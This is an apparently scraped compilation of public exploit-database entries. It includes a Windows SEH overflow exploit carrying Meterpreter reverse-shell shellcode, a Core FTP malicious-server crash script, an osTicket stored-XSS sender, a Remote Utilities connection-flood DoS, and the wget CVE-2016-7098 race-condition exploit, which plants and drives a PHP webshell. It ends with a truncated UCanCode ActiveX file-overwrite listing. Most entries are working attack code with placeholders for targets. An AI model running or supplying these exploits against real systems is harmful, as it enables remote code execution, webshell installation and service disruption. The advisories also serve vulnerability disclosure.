print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.26: www.exploit-db.com/exploits/40455/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 10015BBE

nseh = "\x90\x90\xEB\x0B"
seh = "\xBE\x5B\x01\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
HireHackking 
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec



Vendor:
===============
www.coreftp.com



Product:
========================
Core FTP LE (client)
v2.2 build 1883

Core FTP LE - free Windows software that includes the client FTP features
you need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and
drop support, file viewing & editing, firewall support,
custom commands, FTP URL parsing, command line transfers, filters, and
much, much more.



Vulnerability Type:
================================
Remote SSH/SFTP Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

Core FTP client is vulnerable to remote buffer overflow denial of service
when connecting to a malicious server using
SSH/SFTP protocol.

Upon receiving an overly long string of junk from the malicious FTP server
response, Core FTP crashes and the stack
is corrupted with several registers EBX, EDX, EDI being overwritten as can
be seen below.

WinDbg dump...

(d9c.16d8): Access violation - code c0000005 (first/second chance not
available)
eax=035b0000 ebx=00004141 ecx=03ac7e40 edx=41414141 esi=03ac7e38
edi=41414141
eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0         nv up ei pl nz ac pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010216
ntdll!RtlImageNtHeader+0x92f:
77313ac3 8b12            mov     edx,dword ptr [edx]
 ds:002b:41414141=????????




Exploit code(s):
===============

import socket

print 'hyp3rlinx - Apparition Security'
print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n'
host='127.0.0.1'

port = 22
s = socket.socket()

payload="A"*77500
s.bind((host, port))
s.listen(5)

print 'Listening on port... %i' %port
print 'Connect to me!'

while True:
    conn, addr = s.accept()
    conn.send(payload+'\r\n')
    conn.close()



Exploitation Technique:
=======================
Remote



Severity Level:
===============
High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
HireHackking 
# Exploit Title: Osticket 1.9.14 and below (X-Forwarded-For) Stored XSS.
# Date: 24-11-2016
# Exploit Author: Joaquin Ramirez Martinez [ i0-SEC ]
# Software Link: http://osticket.com/
# Vendor: Osticket

"""
==============
 DESCRIPTION
==============

**osTicket** is a widely-used open source support ticket system. It seamlessly
integrates inquiries created via email, phone and web-based forms into a
simple easy-to-use multi-user web interface. Manage, organize and archive
all your support requests and responses in one place while providing your
customers with accountability and responsiveness they deserve.

(copy of Osticket - README.md)

=======================
 VULNERABILITY DETAILS
=======================

file `osticket/upload/bootstrap.php` contains this 
snippet of code (line 337-340):

  ...

if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    // Take the left-most item for X-Forwarded-For
    $_SERVER['REMOTE_ADDR'] = trim(array_pop(
        explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])));

   ....

The $_SERVER['REMOTE_ADDR'] value gets overrided with the `X-Forwarded-For` header value,
at this point, it is not a vulnerability but...
file `osticket/upload/include/class.osticket.php` line 309-315 :

  ...

//Save log based on system log level settings.
        $sql='INSERT INTO '.SYSLOG_TABLE.' SET created=NOW(), updated=NOW() '
            .',title='.db_input(Format::sanitize($title, true))
            .',log_type='.db_input($loglevel[$level])
            .',log='.db_input(Format::sanitize($message, false))
            .',ip_address='.db_input($_SERVER['REMOTE_ADDR']);

        db_query($sql, false);

    ....


Everytime when a csrf attack is dettected (checking `X_CSRFTOKEN` header or the post parameter `__CSRFToken__`), 
Osticket saves into database the user controled value $_SERVER['REMOTE_ADDR'] even if it has an invalid format.

Finally the XSS is triggered when a user who can see the system logs like an administrator, visits
the /scp/logs.php URI. It happens because osticket does not encode the output of the data stored into the database.

The code responsible for lanching the XSS is located in `osticket/upload/include/staff/syslogs.inc-php`
line 142...

...
<td><?php echo $row['ip_address']; ?></td>
...

So...

An attacker can make an HTTP request with a header `X-Forwarded-For` containing the XSS payload 
with an invalid CSRF token to the login interface waiting for an administrator to view the logs and trigger the XSS.


================
  DEMONSTRATION
================

Demo video: https://www.youtube.com/watch?v=lx_WlL89F70

The demo also show a low severity XSS vulnerability in the helpdesk name/title of osticket.


================
  REFERENCES
================

https://github.com/osTicket/osTicket/releases
https://github.com/osTicket/osTicket/releases/tag/v1.9.15

X-Forwarded-For XSS:

https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/4396f91cdc990b7da598a7562eb634b89314b631

heldeskt name/tile XSS:

https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/2fb47bd84d1905b49beab05fcf3f01b00a171c37

================
  MITIGATIONS
================

update to version 1.9.15 or later

================
  CREDITS
================

Vulnerability discovered by Joaquin Ramirez Martinez
  
  https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q/videos
  https://twitter.com/rammarj

================
  TIMELINE
================

13-07-2016 - Vulnerability found
19-09-2016 - Osticket knew the flaws
01-11-2016 - Osticket patches vulnerabilities (v1.9.15 released)
24-11-2016 - Public disclosure.


"""
import urllib
import urllib2
from optparse import OptionParser

options = OptionParser(usage='python %prog [options]', description='Stored XSS')
options.add_option('-t', '--target', type='string', default='http://localhost', help='(required) example: http://localhost')
options.add_option('-p', '--path', type='string', default='/', help='osticket path. Default: /')
options.add_option('-x', '--payload', type='string', default='<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>'
  , help='xss payload. Default: "<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>"')

banner = """ 

======================================================   
                       OSTICKET 
  "The most popular ticketing system in the world"
                      Stored XSS

            by i0-sec (Joaquin R. M.)
======================================================

"""

def main():
    opts,args = options.parse_args()    
    print(banner)
    server = opts.target
    path = opts.path
    body = urllib.urlencode({"__CSRFToken__":"invalid", "do":"scplogin", "userid":"invalid", "passwd":"invalid", "submit":""})    
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
    "Content-type": "application/x-www-form-urlencoded", "X-Forwarded-For": opts.payload}
    url = server+path+"/scp/login.php" #default login interface URI for OSTICKET
    print('[+] Connecting to '+server+path)
    req = urllib2.Request(url, body, headers)
    try:
      print('[+] Sending payload... ')
      response = urllib2.urlopen(req)
      html = response.read()
    except Exception, e:
      pass
    print '[+] Payload sent.'
    print '[+] Completed.\n'

if __name__ == '__main__':
    main()
HireHackking 
# Exploit Title: Remote Utilities - Host 6.3 - Denial of Service
# Date: 2016-11-25
# Exploit Author: Peter Baris
# Vendor Homepage: www.remoteutilities.com 
# Software Link: http://saptech-erp.com.au/resources/executables/host6.3.zip
# Version: 6.3.0.6 - (other version are also affected below version 6.5 beta 3)
# Tested on: Windows 7 SP1 x64 and Windows Server 2008 R2 
# After the notification, the company released a fix in version 6.5 beta 3
# On Windows 7 - the software refuses connections after execution. 
# On Windows 2008 R2 it caused 100% CPU usage and occasional server crash when 1 core was assigned


#!/usr/bin/python
import socket
counter=0

while (counter <= 5000):	
	counter=counter+1
	print(counter)
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect(('<host address>',5650))
	s.close()
HireHackking 
'''
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html

- CVE-2016-7098
- Release date: 24.11.2016
- Revision 1.0
- Severity: Medium
=============================================


I. VULNERABILITY
-------------------------

GNU Wget < 1.18       Access List Bypass / Race Condition


II. BACKGROUND
-------------------------

"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and 
FTP, the most widely-used Internet protocols. 
It is a non-interactive commandline tool, so it may easily be called from 
scripts, cron jobs, terminals without X-Windows support, etc.

GNU Wget has many features to make retrieving large files or mirroring entire 
web or FTP sites easy
"

https://www.gnu.org/software/wget/


III. INTRODUCTION
-------------------------

GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode, 
is affected by a Race Condition vulnerability that might allow remote attackers 
to bypass intended wget access list restrictions specified with -A parameter.
This might allow attackers to place malicious/restricted files onto the system. 
Depending on the application / download directory, this could potentially lead 
to other vulnerabilities such as code execution etc.


IV. DESCRIPTION
-------------------------

When wget is used in recursive/mirroring mode, according to the manual it can 
take the following access list options:

"Recursive Accept/Reject Options:
  -A acclist --accept acclist
  -R rejlist --reject rejlist

Specify comma-separated lists of file name suffixes or patterns to accept or 
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in 
an element of acclist or rejlist, it will be treated as a pattern, rather 
than a suffix."


These can for example be used to only download JPG images. 

It was however discovered that when a single file is requested with recursive 
option (-r / -m) and an access list ( -A ), wget only applies the checks at the
end of the download process. 

This can be observed in the output below:

# wget -r -nH -A '*.jpg' http://attackersvr/test.php
Resolving attackersvr... 192.168.57.1
Connecting to attackersvr|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘test.phpâ€

15:05:46 (27.3 B/s) - ‘test.php†saved [52]

Removing test.php since it should be rejected.

FINISHED


Although wget deletes the file at the end of the download process, this creates 
a race condition as an attacker with control over the URL/remote server could 
intentionally slow down the download process so that they had a chance to make 
use of the malicious file before it gets deleted.

It is very easy to win the race as the file only gets deleted after the HTTP 
connection is terminated. The attacker could therefore keep the connection open 
as long as it was necessary to make use of the uploaded file as demonstrated
in the proof of concept below.


V. PROOF OF CONCEPT EXPLOIT
------------------------------


Here is a simple vulnerable PHP web application that uses wget to download 
images from a user-provided server/URL:


---[ image_importer.php ]---

<?php
        // Vulnerable webapp [image_importer.php]
        // Uses wget to import user images from provided site URL 
        // It only accepts JPG files (-A wget option).

        if ( isset($_GET['imgurl']) ) {
                $URL = escapeshellarg($_GET['imgurl']);
        } else {
                die("imgurl parameter missing");
        }

        if ( !file_exists("image_uploads") ) {
                mkdir("image_uploads");
        }

        // Download user JPG images into /image_uploads directory
        system("wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1");
?>


----------------------------


For example:
https://victimsvr/image_importer.php?imgurl= href="http://images/logo.jpg">http://images/logo.jpg

will cause wget to upload logo.jpg file into:
https://victimsvr/images_uploads/logo.jpg

The wget access list (-A) is to ensure that only .jpg files get uploaded.

However due to the wget race condition vulnerability an attacker could use 
the exploit below to upload an arbitrary PHP script to /image_uploads directory
and achieve code execution.


---[ wget-race-exploit.py ]---
'''

#!/usr/bin/env python

#
# Wget < 1.18  Access List Bypass / Race Condition PoC Exploit
# CVE-2016-7098
#
# Dawid Golunski
# https://legalhackers.com
#
#
# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
# file for long enough to take advantage of it.
# The exploit sets up a web server on port 80 and waits for a download request from wget.
# It then supplies a PHP webshell payload and requests the uploaded file before it gets
# removed by wget. 
#
# Adjust target URL (WEBSHELL_URL) before executing.
# 
# Full advisory at:
#
# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
#
# Disclaimer:
#
# For testing purposes only. Do no harm.
#
# 

import SimpleHTTPServer
import time
import SocketServer
import urllib2
import sys

HTTP_LISTEN_IP = '0.0.0.0'
HTTP_LISTEN_PORT = 80

PAYLOAD='''
<?php
	//our webshell
	system($_GET["cmd"]);
	system("touch /tmp/wgethack");
?>
'''

# Webshell URL to be requested before the connection is closed 
# i.e before the uploaded "temporary" file gets removed.
WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"

# Command to be executed through 'cmd' GET paramter of the webshell
CMD="/usr/bin/id"


class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
   def do_GET(self):
       # Send the payload on GET request
       print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
       self.send_response(200)
       self.send_header('Content-type', 'text/plain')
       self.end_headers()
       self.wfile.write(PAYLOAD)
       print "\n[+] PHP webshell payload was sent.\n"

       # Wait for the file to be flushed to disk on remote host etc.
       print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
       time.sleep(2)

       # Request uploaded webshell
       print "[+} File '" + self.path + "' should be saved by now :)\n"
       print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
       print "[+} Command result: "
       print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()

       print "[+} All done. Closing HTTP connection...\n"
       # Connection will be closed on request handler return
       return

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT

handler.serve_forever()

'''
------------------------------

If the attacker run this exploit on their server ('attackersver') and pointed 
the vulnerable script image_importer.php at it via URL:

https://victimsvr/image_importer.php?imgurl= href="http://attackersvr/webshell.php">http://attackersvr/webshell.php

The attacker will see output similar to:



root@attackersvr:~# ./wget-race-exploit.py 

Wget < 1.18 Access List Bypass / Race Condition PoC Exploit 
CVE-2016-7098

Dawid Golunski 
https://legalhackers.com 

[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...

[+] Got connection from wget requesting /webshell.php via GET :)

victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 -

[+] PHP webshell payload was sent.

[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...

[+} File '/webshell.php' should be saved by now :)

[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id

[+} Command result: 

uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)

[+} All done. Closing HTTP connection...



VI. BUSINESS IMPACT
-------------------------

The vulnerability might allow remote servers to bypass intended wget access list 
restrictions to temporarily store a malicious file on the server. 
In certain cases, depending on the context wget command was used in and download
path, this issue could potentially lead to other vulnerabilities such as
script execution as shown in the PoC section.
 
VII. SYSTEMS AFFECTED
-------------------------

Wget < 1.18
 
VIII. SOLUTION
-------------------------

Update to latest version of wget 1.18 or apply patches provided by the vendor.
 
IX. REFERENCES
-------------------------

https://legalhackers.com

https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html

https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py

https://www.gnu.org/software/wget/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098

https://security-tracker.debian.org/tracker/CVE-2016-7098

http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html

http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com
 
XI. REVISION HISTORY
-------------------------

24.11.2016 - Advisory released
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
HireHackking 
UCanCode multiple vulnerabilities

Url: http://www.hmi-software.com/
     http://www.ucancode.net/index.htm
     http://www.ucancode.net/bbs/zhuce/login.htm

Description: Form vendor's web page "UCanCode Software is a Market Leading provider of HMI & SCADA, CAD, UML, GIS, Vector Graphics
             and Real Time Data Visualization Graphics Source Code Kits for C/C++ and .NET software developers more than 40 countries
             around the world!"
             Great... 40 countries. It's time to take a look to their software!
             Package name "UCanCode_Controls.zip"
             After the installation, we can found these activex controls:
			 
             ---------------------------------------------
             ProgID: UCCVIEWER.UCCViewerCtrl.1
             CLSID: {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
             ---------------------------------------------
             ProgID: UCCDRAW.UCCDrawCtrl.1
             CLSID: {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
             ---------------------------------------------
             progID: TKDRAWCAD.TKDrawCADCtrl.1
             CLSID: {9022B790-B810-45B4-80BC-2D94EEC5343C}
             ---------------------------------------------
             ProgID: UCCPRINT.UCCPrintCtrl.1
             CLSID: {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
             ---------------------------------------------
             ProgID: UCCDIAGRAM.UCCDiagramCtrl.1
             CLSID: {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
             ---------------------------------------------
             ProgID: UCCUML.UCCUMLCtrl.1
             CLSID: {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
             ---------------------------------------------
             ProgID: UCCHMI.UCCHMICtrl.1
             CLSID: {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
             ---------------------------------------------
             ProgID: UCCSIMPLE.UCCSIMPLECtrl.1
             CLSID: {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
             ---------------------------------------------
             and all are marked as: RegKey Safe for Script: True
                                    RegKey Safe for Init: True
                                    Implements IObjectSafety: False

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------
INSECURE METHODS:
In these coontrols there are a lot of insecure methods which can be used to overwrite
arbitrary files in user's pc. This is the complete list:

1) various Export* methods

Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function ExportBitmapData (ByRef phBlob  As Long, ByVal imageShape  As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: TKDRAWCADLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\TKDRAW~1.OCX
Class: TKDrawCAD  {9022B790-B810-45B4-80BC-2D94EEC5343C}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsBitmapFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Sub ExportAsEMFFile (ByVal strFile  As String)
----------------------------------------
Library: UCCDRAWLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDraw.ocx
Class: UCCDraw  {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
Function ExportToBitmapFile (ByVal lpszFile As String) As Boolean
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsBitmapFile (ByVal strFile As String)
----------------------------------------
Library: UCCVIEWERLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCVIE~1.OCX
Class: UCCViewer  {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
Sub ExportAsEMFFile (ByVal strFile As String)
----------------------------------------

2) various Save* methods:

----------------------------------------
Library: UCCSIMPLELib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCSIM~1.OCX
Class: UCCSIMPLE  {EF3AAE34-E60A-11E1-9656-00FF8A2F9C5B}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCHMILib - C:\PROGRA~1\UCANCO~1\UCANCO~1\HMI_OCX\UCCHMI.ocx
Class: UCCHMI  {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCUMLLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCUML.ocx
Class: UCCUML  {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
Function SaveMemory2 (ByVal filename As String, ByVal pData As Long, ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCDIAGRAMLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCDIA~1.OCX
Class: UCCDiagram  {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
Function SaveTemplateToFile (ByVal strFile As String) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Function SaveMemory2 (ByVal filename As String , ByVal pData As Long , ByVal nSize As Long) As Boolean
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
Sub SaveToXdgFile (ByVal lpszFileName As String)
----------------------------------------
Library: UCCPRINTLib - C:\PROGRA~1\UCANCO~1\UCANCO~1\OCX_PR~1\UCCPrint.ocx
Class: UCCPrint  {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
